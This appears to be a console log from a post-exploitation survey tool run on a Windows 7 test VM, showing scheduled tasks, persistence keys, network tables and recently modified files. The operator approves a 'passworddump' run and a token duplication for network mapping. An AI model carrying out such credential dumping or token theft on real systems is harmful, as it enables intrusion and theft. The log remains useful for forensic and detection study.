  574. | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask |
  575. | SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator |
  576. | SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask |
  577. | SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip |
  578. | SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag |
  579. | SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled |
  580. | SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector |
  581. | SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications |
  582. | SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT |
  583. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch |
  584. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService |
  585. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks |
  586. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit |
  587. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady |
  588. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate |
  589. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
  590. | SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
  591. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
  592. | SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
  593. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate |
  594. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery |
  595. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery |
  596. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 |
  597. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 |
  598. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
  599. | SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
  600. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
  601. | SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
  602. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch |
  603. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot |
  604. | SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
  605. | SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
  606. | SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath |
  607. | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector |
  608. | SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector |
  609. | SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart |
  610. | SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove |
  611. | SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService |
  612. | SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo |
  613. | SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem |
  614. | SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask |
  615. | SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager |
  616. | SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup |
  617. | SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask |
  618. | SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager |
  619. | SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive |
  620. | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 |
  621. | SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 |
  622. | SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor |
  623. | SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime |
  624. | SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig |
  625. | SERVICE | COM job ClassID and data: {900BE39D-6BE8-461A-BC4D-B0FA71F5ECB1} - | | | HIGHEST | WDI\ResolutionHost |
  626. | SERVICE | %%%%SystemRoot%%%%\system32\Wat\WatAdminSvc.exe /run (runs in "") | DAILY 2017-07-24T21:30:29Z | DAILY 2017-07-24T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTask |
  627. | SERVICE | %%%%SystemRoot%%%%\system32\schtasks.exe /run /I /TN "\Microsoft\Windows\Windows Activation Technologies\ValidationTask" (runs in "") | DAILY 2017-08-03T21:30:29Z | DAILY 2017-08-03T21:30:29Z | LOCAL SERVICE LEAST | Windows Activation Technologies\ValidationTaskDeadline |
  628. | SERVICE | %%%%windir%%%%\system32\wermgr.exe -queuereporting (runs in "") | LOGON | LOGON | LEAST | Windows Error Reporting\QueueReporting |
  629. | SERVICE | %%%%windir%%%%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange (runs in "") | EVENT | EVENT | SYSTEM LEAST | Windows Filtering Platform\BfeOnServiceStartTypeChange |
  630. | SERVICE | "%%%%ProgramFiles%%%%\Windows Media Player\wmpnscfg.exe" (runs in "") | EVENT | EVENT | LEAST | Windows Media Sharing\UpdateLibrary |
  631. | SERVICE | %%%%systemroot%%%%\System32\sdclt.exe /CONFIGNOTIFICATION (runs in "") | DAILY 2013-10-30T10:00:00 | DAILY 2013-10-30T10:00:00 | LOCAL SERVICE LEAST | WindowsBackup\ConfigNotification |
  632. | SERVICE | COM job ClassID and data: {0358B920-0AC7-461F-98F4-58E32CD89148} - | LOGON | LOGON | LEAST | Wininet\CacheTask |
  633. | SERVICE | c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (runs in "") | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | DAILY 2000-01-01T04:40:02 2100-01-01T00:00:00 | SYSTEM HIGHEST | Windows Defender\MP Scheduled Scan |
  634.  
  635. - [2017-04-28 09:49:57 z0.0.0.11] =============================== Persistence checks ===============================================================
  636. - | Path/Key | File/Value | Data |
  637. - +------------------------------------------------------------+---------------+------------------------------------------+
  638. - | system\currentcontrolset\Services\tcpip\Parameters\Winsock | HelperDllName | %%%%SystemRoot%%%%\System32\wshtcpip.dll |
  639. - | Software\Microsoft\Windows NT\CurrentVersion\Windows | AppInit_Dlls | |
  640. - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Shell | explorer.exe |
  641. - | Software\Microsoft\Windows NT\CurrentVersion\winlogon | Userinit | C:\Windows\system32\userinit.exe, |
  642. - | Software\Microsoft\Windows\CurrentVersion\Run | VBoxTray | C:\Windows\system32\VBoxTray.exe |
  643. - [2017-04-28 09:50:08 z0.0.0.11] Saved safety handlers for future op(s)
  644.  
  645. - [2017-04-28 09:50:09 z0.0.0.11] ================================== Password dump ==================================================================
  646. - [2017-04-28 09:50:09 z0.0.0.11] 1 safety handler registered for passworddump
  647. I think it's safe to run passworddump. Do you want to run it?
  648. YES
  649.  
  650. - [2017-04-28 09:50:23 z0.0.0.11] ================================= OS information =================================================================
  651. - [2017-04-28 09:50:26 z0.0.0.11] Data age: 02 seconds - data is fresh
  652.  
  653. - OS installed on Wed Oct 23 09:22:44 2013
  654. - System language settings
  655. Locale: English (USA)
  656. Installed: English (USA)
  657. UI: English (USA)
  658. OS: English (USA)
  659. - System version information
  660. Version: 6.1.1.0 Build 7601 winnt i386 Service Pack 1
  661.  
  662. - [2017-04-28 09:50:27 z0.0.0.11] ============================= Networking Information =============================================================
  663.  
  664. FQDN: IE11Win7
  665. DNS Servers: 192.168.1.1
  666. - [2017-04-28 09:50:27 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
  667. | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
  668. +--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
  669. | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |
  670.  
  671. - ------------------------------------------------------------------- Route table -------------------------------------------------------------------
  672. - [2017-04-28 09:50:28 z0.0.0.11] Data age: 01 seconds - data is fresh
  673. | Dest. network | Mask | Gateway | Interface | Metric | Origin |
  674. +----------------------------------------+-----------------+---------------------------+--------------+--------+-----------+
  675. | 0.0.0.0 | 0.0.0.0 | 192.168.1.1 | 192.168.1.58 | 10 | MANUAL |
  676. | 127.0.0.0 | 255.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
  677. | 127.0.0.1 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
  678. | 127.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
  679. | 192.168.1.0 | 255.255.255.0 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
  680. | 192.168.1.58 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
  681. | 192.168.1.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
  682. | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 127.0.0.1 | 306 | WELLKNOWN |
  683. | 224.0.0.0 | 240.0.0.0 | 0.0.0.0 | 192.168.1.58 | 266 | WELLKNOWN |
  684. | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 127.0.0.1 | 306 | MANUAL |
  685. | 255.255.255.255 | 255.255.255.255 | 0.0.0.0 | 192.168.1.58 | 266 | MANUAL |
  686. | :: | 0 | fe80::267f:20ff:fecc:26ba | 192.168.1.58 | 266 | ROUTER_AD |
  687. | ::1 | 128 | :: | 127.0.0.1 | 306 | MANUAL |
  688. | 2001:: | 32 | :: | | 8 | ROUTER_AD |
  689. | 2001:0:9d38:953c:18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
  690. | 2600:6c55:4000:1bb:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
  691. | 2600:6c55:4000:1bb:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
  692. | 2600:6c55:4000:1bb:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
  693. | 2600:6c55:4080:3b:: | 64 | :: | 192.168.1.58 | 18 | ROUTER_AD |
  694. | 2600:6c55:4080:3b:64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
  695. | 2600:6c55:4080:3b:c1a6:e4f8:1108:9c72 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
  696. | fe80:: | 64 | :: | 192.168.1.58 | 266 | MANUAL |
  697. | fe80:: | 64 | :: | | 256 | MANUAL |
  698. | fe80::5efe:c0a8:13a | 128 | :: | | 256 | MANUAL |
  699. | fe80::18fa:3db4:3f57:fec5 | 128 | :: | | 256 | MANUAL |
  700. | fe80::64c4:8bb4:724b:26f3 | 128 | :: | 192.168.1.58 | 266 | MANUAL |
  701. | ff00:: | 8 | :: | 127.0.0.1 | 306 | WELLKNOWN |
  702. | ff00:: | 8 | :: | | 256 | WELLKNOWN |
  703. | ff00:: | 8 | :: | 192.168.1.58 | 266 | WELLKNOWN |
  704.  
  705. - -------------------------------------------------------------------- ARP table --------------------------------------------------------------------
  706. - [2017-04-28 09:50:30 z0.0.0.11] Data age: 01 seconds - data is fresh
  707. | IP | Type | Interface | MAC |
  708. +---------------------------+------+--------------+-------------------------------------------+
  709. | 224.0.0.22 | | 127.0.0.1 | |
  710. | 239.255.255.250 | | 127.0.0.1 | |
  711. | 192.168.1.1 | | 192.168.1.58 | 24-7F-20-CC-26-BA |
  712. | 192.168.1.3 | | 192.168.1.58 | BC-85-56-D3-56-BB |
  713. | 192.168.1.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
  714. | 224.0.0.22 | | 192.168.1.58 | 01-00-5E-00-00-16 |
  715. | 224.0.0.252 | | 192.168.1.58 | 01-00-5E-00-00-FC |
  716. | 239.255.255.250 | | 192.168.1.58 | 01-00-5E-7F-FF-FA |
  717. | 255.255.255.255 | | 192.168.1.58 | FF-FF-FF-FF-FF-FF |
  718. | ff02::c | | 127.0.0.1 | |
  719. | ff02::16 | | 127.0.0.1 | |
  720. | ff02::1:2 | | 127.0.0.1 | |
  721. | ff02::2 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
  722. | ff02::16 | | | 00-00-00-00-00-00-00-00-00-00-00-00-00-00 |
  723. | fe80::267f:20ff:fecc:26ba | | 192.168.1.58 | 24-7F-20-CC-26-BA |
  724. | fe80::e185:cac2:2cba:6d90 | | 192.168.1.58 | BC-85-56-D3-56-BB |
  725. | ff02::1 | | 192.168.1.58 | 33-33-00-00-00-01 |
  726. | ff02::2 | | 192.168.1.58 | 33-33-00-00-00-02 |
  727. | ff02::c | | 192.168.1.58 | 33-33-00-00-00-0C |
  728. | ff02::16 | | 192.168.1.58 | 33-33-00-00-00-16 |
  729. | ff02::1:2 | | 192.168.1.58 | 33-33-00-01-00-02 |
  730. | ff02::1:3 | | 192.168.1.58 | 33-33-00-01-00-03 |
  731. | ff02::1:ff08:9c72 | | 192.168.1.58 | 33-33-FF-08-9C-72 |
  732. | ff02::1:ff4b:26f3 | | 192.168.1.58 | 33-33-FF-4B-26-F3 |
  733. | ff02::1:ffba:6d90 | | 192.168.1.58 | 33-33-FF-BA-6D-90 |
  734. | ff02::1:ffcc:26ba | | 192.168.1.58 | 33-33-FF-CC-26-BA |
  735.  
  736. - ----------------------------------------------------- Getting the pipelist in the background -----------------------------------------------------
  737.  
  738. - --------------------------------------------------------------------- NETBIOS ---------------------------------------------------------------------
  739. Running command 'netbios '
  740. ---------------------------------------------------------------------
  741. IE11WIN7 UNIQUE REGISTERED Workstation Service
  742. WORKGROUP GROUP REGISTERED Domain Name
  743. IE11WIN7 UNIQUE REGISTERED File Server Service
  744. WORKGROUP GROUP REGISTERED Browser Service Elections
  745.  
  746. Adapter Address: 08.00.27.61.eb.58
  747. Adapter Type : Ethernet Adapter
  748.  
  749.  
  750. Command completed successfully
  751. Do you want to run background netmap -minimal?
  752. YES
  753. - Netmap will require user credentials (and probably won't work on 2K8)
  754. - If you want to run netmap, you have to go run "duplicatetoken -duplicate" or logonasuser for me
  755. Do you want to do this?
  756. YES
  757. Please enter the user handle you were given by duplicatetoken or logonasuser I should use (i.e. proc1234)
  758. IEUser
  759. - [2017-04-28 09:51:49 z0.0.0.11] 1 safety handler registered for netmap
  760.  
  761. - [2017-04-28 09:51:51 z0.0.0.11] ============================ Memory usage information ============================================================
  762. - [2017-04-28 09:51:51 z0.0.0.11] 1 safety handler registered for memory
  763. - [2017-04-28 09:51:52 z0.0.0.11] Data age: 01 seconds - data is fresh
  764. - Memory Load : 35%%
  765. - Physical Available: 659 M
  766. - Physical Total : 1023 M
  767.  
  768. - [2017-04-28 09:51:53 z0.0.0.11] ============================ Disk list and space info ============================================================
  769. - [2017-04-28 09:51:56 z0.0.0.11] Data age: 01 seconds - data is fresh
  770. | Drive | Serial | Type | In use (MB) | Change (MB) |
  771. +-------+-----------+-------+-------------------+-------------+
  772. | C | e0ce-337d | Fixed | 9859/129943 (7%%) | 0 |
  773.  
  774. - [2017-04-28 09:51:57 z0.0.0.11] ================================= USB survey info =================================================================
  775. - [2017-04-28 09:51:58 z0.0.0.11] System\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b} data is only 0:00:01.259000 old, was not re-run
  776. - [2017-04-28 09:51:59 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USB data is only 0:00:01.094000 old, was not re-run
  777. - [2017-04-28 09:52:00 z0.0.0.11] SYSTEM\CurrentControlSet\Enum\USBSTOR not found
  778. - [2017-04-28 09:52:00 z0.0.0.11] Showing recent USB devices
  779. [2017-04-28 16:32:32] ##?#IDE#DiskVBOX_HARDDISK___________________________1.0_____#5&394c0ad3&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
  780. [2014-11-26 19:47:05] ##?#IDE#DiskVirtual_HD______________________________1.1.0___#5&35dc7040&0&0.0.0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
  781. [2009-07-14 04:52:51] ##?#SCSI#Disk&Ven_Dell&Prod_VIRTUAL_DISK#6&17b13437&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
  782. - [2017-04-28 09:52:03 z0.0.0.11] User info started in the background as command ID 506.
  783. - [2017-04-28 09:52:03 z0.0.0.11] Extra info to get started in the background as command ID 509.
  784. Running command 'python diffhour.py -args "-safe -sysdrive -recursive"'
  785. - [2017-04-28 09:52:05 z0.0.0.11] Recording initial data, running "dir -mask "*" -path C: -age 1h -recursive"
  786. - [2017-04-28 09:52:05 z0.0.0.11] Running dir -path C: -after "2017-04-28 15:52:06" -mask "*" -recursive -before "2017-04-28 16:52:06"
  787. | Modtime | Size | Path | Name |
  788. +---------------------+------------+-----------------------------------------------------------------------------------------------------------+---------------------------------------------------------------------------------+
  789. | 2017-04-28 16:32:51 | 1073741824 | C:\ | pagefile.sys |
  790. | 2017-04-28 16:40:08 | <DIR> | C:\ProgramData\Microsoft\RAC | Temp |
  791. | 2017-04-28 16:42:08 | 282624 | C:\ProgramData\Microsoft\RAC\PublishedData | RacWmiDatabase.sdf |
  792. | 2017-04-28 16:42:08 | 544768 | C:\ProgramData\Microsoft\RAC\StateData | RacDatabase.sdf |
  793. | 2017-04-28 16:42:08 | 8 | C:\ProgramData\Microsoft\RAC\StateData | RacMetaData.dat |
  794. | 2017-04-28 16:42:08 | 16412 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiDataBookmarks.dat |
  795. | 2017-04-28 16:42:08 | 163868 | C:\ProgramData\Microsoft\RAC\StateData | RacWmiEventData.dat |
  796. | 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications | Windows |
  797. | 2017-04-28 16:33:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.chk |
  798. | 2017-04-28 16:33:36 | 1048576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | MSS.log |
  799. | 2017-04-28 16:33:36 | 8454144 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | tmp.edb |
  800. | 2017-04-28 16:33:36 | 42008576 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows | Windows.edb |
  801. | 2017-04-28 16:33:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs | SystemIndex |
  802. | 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.Crwl |
  803. | 2017-04-28 16:33:36 | 0 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex | SystemIndex.8.gthr |
  804. | 2017-04-28 16:36:36 | <DIR> | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer | CiFiles |
  805. | 2017-04-28 16:36:36 | 8192 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.ci |
  806. | 2017-04-28 16:36:36 | 4096 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.dir |
  807. | 2017-04-28 16:36:36 | 65536 | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles | 00010006.wid |
  808. | 2017-04-28 16:33:45 | 135168 | C:\ProgramData\Microsoft\Windows\DRM | drmstore.hds |
  809. | 2017-04-28 16:35:23 | 0 | C:\ProgramData\Microsoft\Windows Defender | IMpService925A3ACA-C353-458A-AC8D-A7E5EB378092.lock |
  810. | 2017-04-28 16:36:15 | 237282 | C:\ProgramData\Microsoft\Windows Defender\Support | MPLog-07132009-215552.log |
  811. | 2017-04-28 16:46:02 | 786432 | C:\Users\IEUser | NTUSER.DAT |
  812. | 2017-04-28 16:46:02 | 262144 | C:\Users\IEUser | ntuser.dat.LOG1 |
  813. | 2017-04-28 16:33:48 | <DIR> | C:\Users\IEUser\AppData\Local | Temp |
  814. | 2017-04-28 16:46:07 | 524288 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat |
  815. | 2017-04-28 16:46:07 | 246784 | C:\Users\IEUser\AppData\Local\Microsoft\Windows | UsrClass.dat.LOG1 |
  816. | 2017-04-28 16:35:34 | <DIR> | C:\Users\IEUser\AppData\Local\Microsoft\Windows\WER | ERC |
  817. | 2017-04-28 16:33:48 | 3622686 | C:\Users\IEUser\AppData\Local\Temp | BGInfo.bmp |
  818. | 2017-04-28 16:33:34 | <DIR> | C:\Users\IEUser\AppData\Local\Temp | WPDNSE |
  819. | 2017-04-28 16:32:57 | 67584 | C:\Windows | bootstat.dat |
  820. | 2017-04-28 16:37:20 | <DIR> | C:\Windows | inf |
  821. | 2017-04-28 16:33:00 | 2323 | C:\Windows | setupact.log |
  822. | 2017-04-28 16:37:20 | <DIR> | C:\Windows | System32 |
  823. | 2017-04-28 16:36:14 | <DIR> | C:\Windows | Temp |
  824. | 2017-04-28 16:32:56 | 0 | C:\Windows\debug | PASSWD.LOG |
  825. | 2017-04-28 16:33:25 | 36272 | C:\Windows\debug | wlms.log |
  826. | 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf | WmiApRpl |
  827. | 2017-04-28 16:37:20 | <DIR> | C:\Windows\inf\WmiApRpl | 0009 |
  828. | 2017-04-28 16:37:15 | 3444 | C:\Windows\inf\WmiApRpl | WmiApRpl.h |
  829. | 2017-04-28 16:37:20 | 28590 | C:\Windows\inf\WmiApRpl\0009 | WmiApRpl.ini |
  830. | 2017-04-28 16:35:19 | <DIR> | C:\Windows\Microsoft.NET\Framework | v4.0.30319 |
  831. | 2017-04-28 16:45:32 | 262144 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT |
  832. | 2017-04-28 16:45:32 | 226304 | C:\Windows\ServiceProfiles\LocalService | NTUSER.DAT.LOG1 |
  833. | 2017-04-28 16:33:18 | <DIR> | C:\Windows\ServiceProfiles\LocalService\AppData | Local |
  834. | 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive0.dat |
  835. | 2017-04-28 16:32:59 | 0 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | lastalive1.dat |
  836. | 2017-04-28 16:33:00 | 16777216 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-FontFace.dat |
  837. | 2017-04-28 16:33:18 | 319424 | C:\Windows\ServiceProfiles\LocalService\AppData\Local | ~FontCache-System.dat |
  838. | 2017-04-28 16:45:37 | 262144 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT |
  839. | 2017-04-28 16:45:37 | 226304 | C:\Windows\ServiceProfiles\NetworkService | NTUSER.DAT.LOG1 |
  840. | 2017-04-28 16:33:47 | <DIR> | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0 | Icon Files |
  841. | 2017-04-28 16:33:47 | 5022 | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows Media Player NSS\3.0\Icon Files | fa2fa449-604c-4e69-8c5a-6baa8cee5d09.png |
  842. | 2017-04-28 16:40:18 | 578879488 | C:\Windows\SoftwareDistribution\DataStore | DataStore.edb |
  843. | 2017-04-28 16:35:22 | <DIR> | C:\Windows\SoftwareDistribution\DataStore | Logs |
  844. | 2017-04-28 16:40:18 | 8192 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.chk |
  845. | 2017-04-28 16:40:18 | 1310720 | C:\Windows\SoftwareDistribution\DataStore\Logs | edb.log |
